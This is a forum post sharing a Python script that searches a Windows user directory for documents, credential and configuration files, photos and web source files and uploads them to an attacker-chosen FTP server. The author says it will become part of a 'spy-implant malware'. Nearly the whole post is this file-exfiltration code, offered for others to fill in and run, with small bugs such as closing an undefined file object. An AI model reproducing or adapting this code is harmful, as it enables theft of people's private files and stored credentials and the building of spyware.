[Python3] File Exfiltrator to FTP
#1
[Python3] File Exfiltrator to FTP

With a bit of inspiration from the book "Blackhat python" I've decided to make a small script that exfiltrates files and documents after your liking to an ftp server of your choice. Going to upload this script later to GS-Devs github. Will probably also add this as a part of a larger spy-implant malware which I'll release open source later (for learning purposes Smile).

Add your own ftp details and filetypes.
For testing I used https://bakop.com which has 500mb free storage.

Code:
import os, fnmatch, ftplib, time

#Start FTP Session - Credentials
session = ftplib.FTP('server','username','password')

#Exfiltrate and send file based on filetype.
def exfiltrate(filetype):
    for parent, directories, filenames in os.walk("C:\\Users\\"):
        for filename in fnmatch.filter(filenames, "*%s" % filetype):
            document_path = os.path.join(parent, filename)
            time.sleep(0.2) #Give ftp 200ms to relax. Change or remove based on your rate-limits.
            ftpsend = open(document_path,'rb')
            session.storbinary('STOR %s' % filename, ftpsend) #FTP STOR command.
            file.close()
           
#Test file. So you wont send 1000 files during testing.
test_list = [
    ".test3824"
]
           
#List of filetypes for documents.
doc_list = [
    ".pdf",
    ".doc",
    ".odt",
    ".rtf",
    ".ppt",
    ".pptx",
    ".ppx",
    ".txt",
    ".epub",
    ".mobi",
    ".csv",
    ".xlsx",
    ".xls",
    ".docx",
    ".xps",
    ".xlt",
    ".xlsb",
    ".xlsm",
    ".ppa",
    ".pps"
]

#List of filetypes for common credentialstorage and configuration files.
cred_list = [
    ".sql",
    ".sqlite",
    ".dat",
    ".default",
    ".xml",
    ".bak",
    ".profile",
    ".yaml",
    ".json",
    ".stg",
    ".tdat",
    ".purple"
]

#Personal files like pictures and media.
personal_list = [
    ".wav",
    ".mp4",
    ".jpg",
    ".jpeg",
    ".png",
    ".gif",

]

#List of random project files for development.
project_list = [
    ".php",
    ".html",
    ".js",
    ".css"
]

#Function for exfiltrating lists of filetypes.
def exfiltratelist(filelist):
    for i in filelist:
        exfiltrate(i)

#Call test exfiltration
exfiltrate(test_list)

#Quit FTP Session
session.quit()
Reply